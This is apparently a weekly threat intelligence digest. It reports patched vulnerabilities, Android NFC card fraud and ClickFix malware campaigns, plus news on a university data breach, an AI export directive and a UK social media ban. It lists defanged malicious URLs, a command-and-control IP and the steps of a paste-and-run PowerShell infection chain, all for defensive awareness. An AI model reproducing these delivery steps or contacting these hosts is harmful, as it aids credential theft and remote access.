Cyber Threat Intelligence Digest: Week 24

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

IBM Patches CVE-2026-7870 Affecting IBM i Operating System - On 9th June 2026, IBM patched CVE-2026-7870, a high-severity uncontrolled search path element vulnerability affecting IBM i operating system versions 7.3, 7.4, 7.5, and 7.6. The flaw stems from an unqualified library call within the operating system, which could allow a threat actor to execute user-controlled code with administrator privileges.

At the time of writing, no active exploitation of CVE-2026-7870 has been reported. Organisations running the affected IBM i versions are advised to apply the available patch promptly to mitigate the risk of privilege escalation.

Apache Patches CVE-2026-50623 Authentication in Apache CXF - On 12th June 2026, Apache patched and disclosed CVE-2026-50623, a high-severity improper input validation vulnerability affecting Apache CXF versions 4.2.0 and prior to 4.2.2, and prior to 4.1.7. Successful exploitation of this flaw would allow a threat actor to execute arbitrary code on affected systems.

Apache addressed the vulnerability in versions 4.2.2 and 4.1.7, and organisations running earlier releases are advised to upgrade promptly. At the time of writing, there are no known instances of active exploitation in the wild.

Canon Patches Five EOS Network Setting Tool Vulnerabilities (CVE-2026-9258, CVE-2026-9259, CVE-2026-9260, CVE-2026-9261, CVE-2026-9262) - On 15th June 2026, Canon patched five vulnerabilities - CVE-2026-9258, CVE-2026-9259, CVE-2026-9260, CVE-2026-9261, and CVE-2026-9262 - affecting its EOS Network Setting Tool version 1.5.0 and earlier, available on both Windows and macOS, and bundled within EOS Utility versions 3.12.0 through 3.20.20.

Canon addressed the vulnerabilities with the release of EOS Network Setting Tool version 1.5.1, included in EOS Utility version 3.20.21 or later, and users running affected versions are advised to update accordingly.

Potential Threats

Threat Actors Distribute NFCShare Through Bank-Themed Phishing Websites and GitHub-Hosted Android APKs to Facilitate NFC Payment Card Fraud - On 8th June 2026, cybersecurity firm D3Lab published a technical analysis detailing the evolution of the NFCShare Android fraud campaign. NFCShare is an Android malware family that harvests payment card data via Near Field Communication (NFC) and collects associated PINs from victims. The campaign utilises GitHub-hosted APKs, frequent rebuilds, and anti-analysis techniques, whilst impersonating Italian and European banking organisations including Intesa Sanpaolo, Banca Sella, Fideuram, Nexi, Mooney, BCC Roma, Klirway, and CaixaBank.

The infection chain begins when victims visit phishing sites impersonating banking institutions, where they are prompted to download a malicious APK disguised as a legitimate banking application update. Once installed, NFCShare instructs victims to place a payment card near the device, extracts card details via NFC using the EMV SELECT command, and prompts for a PIN before exfiltrating all collected data to threat actor-controlled infrastructure. D3Lab identified consistent family markers across samples, including the nfc.share.itnamteis namespace, MqttChannel messaging framework, and NPStringFog string obfuscation, with newer samples introducing malformed ZIP paths to hinder automated analysis.

ClickFix Campaign Abuses Google Sites to Deliver Information Stealer Payload - On 3rd July 2026, ANY.RUN published a report detailing a ClickFix campaign impersonating popular AI tools, including Codex and Claude, to deliver an information stealer payload. The campaign directed victims to fake installation pages hosted on sites[.]google[.]com, with both observed URLs returning error messages at the time of writing.

The pages prompted victims to open PowerShell and execute a malicious mshta command, which initiated a multi-stage delivery process. This extracted a steganographic payload from an image, deployed shellcode, and executed the information stealer in memory within powershell.exe, subsequently exfiltrating browser credentials, email data, and cryptocurrency wallet information to threat actor-controlled command-and-control infrastructure.

Threat Actors Abuse Fake Amazon Security Alerts to Deliver HarborWatch Agent Through ClickFix - On 8th June 2026, Cofense published a report detailing an Amazon-themed phishing campaign abusing the ClickFix self-infection technique to deliver HarborWatch Agent, a custom remote access trojan (RAT) that collects host information, checks in with command-and-control (C2) infrastructure, retrieves tasks, and supports threat actor monitoring via a web interface. Threat actors distribute a phishing email with the subject "Security alert: Login activity anomaly notification", creating urgency through fake account details and a lookalike sender address, with a embedded button redirecting victims to amazonattention[.]com/verify, which remained active at the time of writing.

The landing page presents a fake CAPTCHA-style check that instructs victims to press Windows Key + R and paste clipboard content, which silently executes a hidden PowerShell command decoding a Base64 string that retrieves and runs a remote script from hxxps://amazonalert[.]xyz/download/code[.]txt. This script downloads HarborWatch Agent, disguised as mysql.exe, from hxxps://zoomupdate[.]b-cdn[.]net/mysql[.]exe and executes it with a hardcoded password argument, likely as an anti-analysis control. Once active, the RAT establishes a connection to hxxp://185[.]193[.]127[.]44, collects detailed system information, and communicates via dedicated API endpoints for task retrieval and heartbeat traffic. Cofense also identified an administrator panel on the same IP featuring Chinese-language branding translated as "Harbor Sentinel", advertising asset monitoring and real-time status updates consistent with the RAT's observed behaviour.

General News

University of Nottingham confirms cyber incident as Shiny Hunters group claims data theft - The University of Nottingham confirmed a cyber incident in which a significant amount of data belonging to current and former students was accessed by an external third party. The university stated it is still working to understand the full scope of the breach and has already directly contacted affected individuals, potentially including those at its campuses in Malaysia and China as well as in Nottingham. The incident has been claimed by the ShinyHunters cybercrime group, which alleged on its extortion site to have obtained over 40GB of material including credit card and payment details.

Analysis by HaveIBeenPwned of the group's partially published data indicates it includes approximately 455,000 unique email addresses alongside extensive personal information such as names, addresses, phone numbers, ethnicities, disabilities, passport numbers, and data relating to academic enrolments and fee payments. The university confirmed it is working with a third party on a forensic investigation to verify the exact scope of the data accessed and has stated it will provide further updates as the investigation progresses. It is worth noting that ShinyHunters has a history of misrepresenting its access in extortion attempts, including the use of historical or publicly available datasets presented as internal system breaches.

Anthropic says US government forced it to disable cybersecurity AI models - Anthropic disabled two of its most advanced cybersecurity-focused AI models, Fable 5 and Mythos 5, following an export control directive issued by the US government barring any foreign national from accessing them, including Anthropic's own employees. The directive cited national security authorities and appears to represent the first instance of such powers being used to curtail the export of AI models rather than chips or hardware. Anthropic stated its understanding is that the government believed a jailbreaking method for Fable 5 had been identified, though only verbal evidence was provided, and concluded upon review that the vulnerabilities were minor, previously known, and reproducible using other publicly available models.

Whilst complying, Anthropic publicly disputed the directive's basis, warning that applying such a standard across the industry would effectively halt all new frontier model deployments. The action arrived two days after chief executive Dario Amodei published a policy essay calling for government authority to block unsafe AI deployments — a position the company maintained, whilst insisting such authority should operate through a transparent and technically grounded statutory process. The directive also comes amid broader tensions with the Trump administration, following Defence Secretary Pete Hegseth's designation of Anthropic as a "supply chain risk" in February after contract negotiations over military use of Claude broke down. Anthropic apologised for the disruption and stated it is working to restore access as soon as possible.

UK to ban social media access for children under 16 - British Prime Minister Keir Starmer has announced plans to ban under-16s from using social media platforms including TikTok, Facebook, Instagram, Snapchat, X, and YouTube, whilst messaging services such as WhatsApp will be exempt. The government intends to introduce legislation before Christmas, with enforcement expected by spring 2027. The ban will be modelled on a similar measure introduced in Australia last December but will go further, including additional restrictions on harmful functions such as livestreaming and stranger communication for under-16s, extending to gaming sites. AI romantic companion chatbots and intimate functionalities on all other chatbots will be restricted for under-18s.

The UK's communications regulator has been tasked with designing robust age assurance measures, with further announcements expected next month including possible overnight curfews and mandatory breaks in infinite scrolling for under-18s. However, the policy faces scrutiny on several fronts. Evidence from Australia suggests blanket bans have limited effectiveness, with nearly a third of children retaining social media accounts after the ban took effect, largely because platforms failed to enforce age verification. Critics including Amnesty International UK have argued the approach targets children rather than the platforms themselves, which they contend are unsafe by design. Political analysts have also noted that Starmer's current vulnerability could complicate the government's ability to see the legislation through to enactment.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.